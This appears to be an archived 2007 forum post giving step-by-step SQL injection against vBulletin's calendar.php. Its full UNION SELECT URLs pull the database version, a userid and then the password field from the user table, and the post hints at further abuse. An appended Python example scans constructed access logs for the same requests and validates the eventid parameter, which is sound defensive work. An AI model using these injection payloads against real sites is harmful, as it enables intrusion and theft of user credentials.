岁月联盟 - Technical Community - BBS.SYUE.COM's Archiver

绝版青春 posted on 2007-1-30 23:03

The steps to exploit vBulletin forum

1. Make sure calendar.php exists.

2. Add a private event:

http://www.xxx.com/calendar.php?action=add&type=private&s=

3. You will get an eventid (e.g. 14) after that; now check that event.

http://www.xxx.com/calendar.php?s=&action=edit&eventid=14

4. Get your userid

http://www.xxx.com/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate

If the MySQL version is below 4.0.0, this step will fail.

The userid is in the subject field (e.g. 31874).

The reason to know the userid is to pass the following code.

----------------------------------------------------------------
if ($eventinfo[userid] != $bbuserinfo[userid])
{
    $permissions=getpermissions();
    if ($permissions[canpublicedit]!=1) {
        show_nopermission();
    }
}
-----------------------------------------------------------------

5. The dirty part

http://www.xxx.com/calendar.php?s=&action=edit&eventid=14 union (SELECT 1,0,31874,'0000-0-0',password,userid FROM user WHERE userid = 31874) order by eventdate

Let the subject and event fields show the result.

6. There are a lot of other things you would do. ;)
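
A detection-side view of the requests in the post above, as an added example that is not part of the original post: it scans web-server access logs for calendar.php requests whose eventid is not a plain integer, and applies the same allow-list as an input check. The log lines are constructed, and the function names, the combined log format and the digits-only rule for eventid are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format), not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Jan/2007:23:01:10 +0800] "GET /calendar.php?s=&action=edit&eventid=14 HTTP/1.1" 200 5120
203.0.113.5 - - [30/Jan/2007:23:02:41 +0800] "GET /calendar.php?s=&action=edit&eventid=14%20union%20(SELECT%201)%20order%20by%20eventdate HTTP/1.1" 200 5233
198.51.100.7 - - [30/Jan/2007:23:03:02 +0800] "GET /calendar.php?action=add&type=private&s= HTTP/1.1" 200 4410
198.51.100.7 - - [30/Jan/2007:23:03:09 +0800] "GET /index.php?eventid=abc HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
# Assumption: a legitimate eventid is a short run of ASCII digits (the post's example is 14).
EVENTID_OK = re.compile(r"[0-9]{1,10}")


def eventid_values(target):
    """Return the URL-decoded eventid values of a calendar.php request target."""
    parts = urlsplit(target)
    if not parts.path.endswith("/calendar.php"):
        return []
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    return [value for key, value in pairs if key == "eventid"]


def suspicious_requests(log_text):
    """Return (client, decoded eventid) for calendar.php hits with a non-integer eventid."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        for value in eventid_values(target):
            # Anything beyond digits (spaces, quotes, parentheses, a second
            # layer of percent-encoding) is reported, not just known keywords.
            if not EVENTID_OK.fullmatch(value):
                hits.append((client, value))
    return hits


def safe_eventid(raw):
    """Allow-list check to apply to eventid before it reaches any SQL statement."""
    if not EVENTID_OK.fullmatch(raw or ""):
        raise ValueError("eventid must be a positive integer")
    return int(raw)


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client}: eventid={value!r}")
```

The post does not show the query behind calendar.php, so treating eventid as an integer that should be validated or bound as a parameter is an assumption about the fix rather than a description of vBulletin's code.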
